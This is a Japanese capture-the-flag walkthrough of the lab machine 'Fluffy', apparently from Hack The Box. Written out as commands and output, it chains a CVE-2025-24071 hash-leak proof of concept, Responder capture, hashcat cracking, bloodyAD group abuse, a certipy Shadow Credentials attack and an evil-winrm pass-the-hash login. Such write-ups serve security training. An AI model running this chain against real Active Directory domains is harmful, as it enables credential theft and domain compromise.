目次
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-22 21:45:08Z) 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-04-17T16:04:17 | Not valid after: 2026-04-17T16:04:17 | MD5: 2765 a68f 4883 dc6d 0969 5d0d 3666 c880 | SHA-1: 72f3 1d5f e6f3 b8ab 6b0e dd77 5414 0d0c abfe e681 | SHA-256: 20ab 7b99 256b 4385 9fac 457a 1890 37bf 37e2 5f11 5a62 e97c e072 e586 e83e 9dca | -----BEGIN CERTIFICATE----- | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5 | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0 | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4 | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3 | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8 | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0 | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6 | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1 | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ== |_-----END CERTIFICATE----- 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-04-17T16:04:17 | Not valid after: 2026-04-17T16:04:17 | MD5: 2765 a68f 4883 dc6d 0969 5d0d 3666 c880 | SHA-1: 72f3 1d5f e6f3 b8ab 6b0e dd77 5414 0d0c abfe e681 | SHA-256: 20ab 7b99 256b 4385 9fac 457a 1890 37bf 37e2 5f11 5a62 e97c e072 e586 e83e 9dca | -----BEGIN CERTIFICATE----- | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5 | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0 | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4 | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3 | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8 | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0 | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6 | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1 | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ== |_-----END CERTIFICATE----- 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-04-17T16:04:17 | Not valid after: 2026-04-17T16:04:17 | MD5: 2765 a68f 4883 dc6d 0969 5d0d 3666 c880 | SHA-1: 72f3 1d5f e6f3 b8ab 6b0e dd77 5414 0d0c abfe e681 | SHA-256: 20ab 7b99 256b 4385 9fac 457a 1890 37bf 37e2 5f11 5a62 e97c e072 e586 e83e 9dca | -----BEGIN CERTIFICATE----- | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5 | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0 | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4 | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3 | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8 | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0 | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6 | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1 | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ== |_-----END CERTIFICATE----- 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.fluffy.htb | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-04-17T16:04:17 | Not valid after: 2026-04-17T16:04:17 | MD5: 2765 a68f 4883 dc6d 0969 5d0d 3666 c880 | SHA-1: 72f3 1d5f e6f3 b8ab 6b0e dd77 5414 0d0c abfe e681 | SHA-256: 20ab 7b99 256b 4385 9fac 457a 1890 37bf 37e2 5f11 5a62 e97c e072 e586 e83e 9dca | -----BEGIN CERTIFICATE----- | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5 | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0 | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4 | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3 | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8 | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0 | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6 | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1 | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ== |_-----END CERTIFICATE----- 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49693/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49694/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49713/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49726/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49760/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
提示されているアカウント情報でSMBアクセスします。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ smbclient //10.129.10.103/IT -U "j.fleischman%J0elTHEM4n1990\!"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon May 19 23:27:02 2025
.. D 0 Mon May 19 23:27:02 2025
Everything-1.4.1.1026.x64 D 0 Sat Apr 19 00:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Sat Apr 19 00:04:05 2025
KeePass-2.58 D 0 Sat Apr 19 00:08:38 2025
KeePass-2.58.zip A 3225346 Sat Apr 19 00:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 23:31:07 2025
5842943 blocks of size 4096. 1857948 blocks available
smb: \> get Everything-1.4.1.1026.x64.zip
getting file \Everything-1.4.1.1026.x64.zip of size 1827464 as Everything-1.4.1.1026.x64.zip (670.7 KiloBytes/sec) (average 670.7 KiloBytes/sec)
smb: \> get KeePass-2.58.zip
getting file \KeePass-2.58.zip of size 3225346 as KeePass-2.58.zip (174.6 KiloBytes/sec) (average 238.4 KiloBytes/sec)
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (156.0 KiloBytes/sec) (average 234.3 KiloBytes/sec)
smb: \>
「Upgrade_Notice.pdf」には脆弱性に関する情報が記載されています。
PDFの中にあるCVE-2025-24071はNTハッシュ値の漏洩に関するものです。
上記のPoCを実行します。
┌──(kali㉿kali)-[~/htb/fluffy] └─$ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git Cloning into 'CVE-2025-24071_PoC'... remote: Enumerating objects: 18, done. remote: Counting objects: 100% (18/18), done. remote: Compressing objects: 100% (16/16), done. remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0) Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done. Resolving deltas: 100% (4/4), done. ┌──(kali㉿kali)-[~/htb/fluffy] └─$ ┌──(kali㉿kali)-[~/htb/fluffy] └─$ cd CVE-2025-24071_PoC ┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC] └─$ ls README.md poc.py ┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC] └─$ python3 poc.py Enter your file name: exploit Enter IP (EX: 192.168.1.162): 10.10.14.179 completed ┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC] └─$ smbclient //10.129.232.88/IT -U "j.fleischman%J0elTHEM4n1990\!" Try "help" to get a list of possible commands. smb: \> put exploit exploit does not exist smb: \> put ./exploit.zip putting file ./exploit.zip as \exploit.zip (0.6 kB/s) (average 0.6 kB/s) smb: \>
responder側でNTハッシュが取得できます。
[SMB] NTLMv2-SSP Client : 10.129.232.88 [SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:da80d6146d797b5b:AE4434E2F7D9D237BCC2F8FC624EF2C7:010100000000000000D2269CFFBEDC012AA49D22A27422610000000002000800550036003500300001001E00570049004E002D00530059004400530056004A0043004C0041003200520004003400570049004E002D00530059004400530056004A0043004C004100320052002E0055003600350030002E004C004F00430041004C000300140055003600350030002E004C004F00430041004C000500140055003600350030002E004C004F00430041004C000700080000D2269CFFBEDC01060004000200000008003000300000000000000001000000002000001CD51F0DAE3A6E1175E4DBA205E533128F1223F5DB4AB6392CB78A9EFFEC31580A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100370039000000000000000000
取得したhashを解析します。
ハッシュ特定
~$ hashcat agila.hash ./rockyou.txt hashcat (v6.2.5) starting in autodetect mode OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ===================================================================================================================================== * Device #1: pthread-AMD Ryzen 3 3100 4-Core Processor, 2898/5860 MB (1024 MB allocatable), 8MCU The following 2 hash-modes match the structure of your input hash: # | Name | Category ======+=====================================================+====================================== 5600 | NetNTLMv2 | Network Protocol 27100 | NetNTLMv2 (NT) | Network Protocol Please specify the hash-mode with -m [hash-mode].
ハッシュ解析 hashcat -m 5600 -a 0 agila.hash ./rockyou.txt P.AGILA::FLUFFY:da80d6146d797b5b:ae4434e2f7d9d237bcc2f8fc624ef2c7:010100000000000000d2269cffbedc012aa49d22a27422610000000002000800550036003500300001001e00570049004e002d00530059004400530056004a0043004c0041003200520004003400570049004e002d00530059004400530056004a0043004c004100320052002e0055003600350030002e004c004f00430041004c000300140055003600350030002e004c004f00430041004c000500140055003600350030002e004c004f00430041004c000700080000d2269cffbedc01060004000200000008003000300000000000000001000000002000001cd51f0dae3a6e1175e4dba205e533128f1223f5db4ab6392cb78a9effec31580a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100370039000000000000000000:prometheusx-303
取得したアカウント情報でbloodhoundを実行します。
p.agilaはservice accountsにGenericAllを持ちます。
service accountsの権限は以下の通りです。
winrm_svcにGenericWriteの権限があり、エッジの解説を読むとShadow Credentialの記載があります。
p.agilaをservice accountsに追加します。
また、確実に追加されたかを確認するためにグループメンバーの情報を確認します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ bloodyAD --host '10.129.12.232' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ bloodyAD --host 10.129.12.232 -d 'dc01.fluffy.htb' \
-u 'p.agila' -p 'prometheusx-303' \
get search --filter "(cn=Service Accounts)" distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
cn: Service Accounts
dSCorePropagationData: 2025-04-19 12:38:12+00:00
groupType: -2147483646
instanceType: 4
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb; CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb; CN=ldap service,CN=Users,DC=fluffy,DC=htb; CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
また、攻撃前に時刻同期を行います。時刻同期の方法は以下の記事を参照。
service accountsに追加後、Shadow Credentials攻撃を行います。
※certipy実行時にNo Route~のようなエラーが出る場合は、「-dc-host」を指定することで改善する場合があります。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow auto \
-u 'p.agila@fluffy.htb' \
-p 'prometheusx-303' \
-dc-ip 10.129.12.232 \
-dc-host dc01.fluffy.htb \
-account 'WINRM_SVC'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3ff6fabc967841268c6c0dc7b5ad8ac7'
[*] Adding Key Credential with device ID '3ff6fabc967841268c6c0dc7b5ad8ac7' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '3ff6fabc967841268c6c0dc7b5ad8ac7' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
┌──(kali㉿kali)-[~/htb/fluffy]
└─$
user.txt取得
取得したハッシュでアクセスできます。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ evil-winrm -i 10.129.12.232 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
